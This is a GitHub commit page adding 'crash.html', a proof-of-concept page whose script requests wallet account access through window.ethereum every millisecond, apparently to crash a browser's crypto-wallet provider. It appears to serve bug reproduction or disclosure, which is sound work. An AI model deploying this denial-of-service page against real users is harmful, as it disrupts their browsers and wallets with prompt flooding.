Skip to content

Commit

Permalink
Crash POC
Browse files Browse the repository at this point in the history
  • Loading branch information
kjozwiak authored Jan 8, 2025
1 parent f8371d5 commit a2cae08
Showing 1 changed file with 5 additions and 0 deletions.
5 changes: 5 additions & 0 deletions crash.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
<html>
<script>
setInterval(()=>{ window.ethereum.request({ method: 'eth_requestAccounts' }); }, 1);
</script>
</html>

0 comments on commit a2cae08

Please sign in to comment.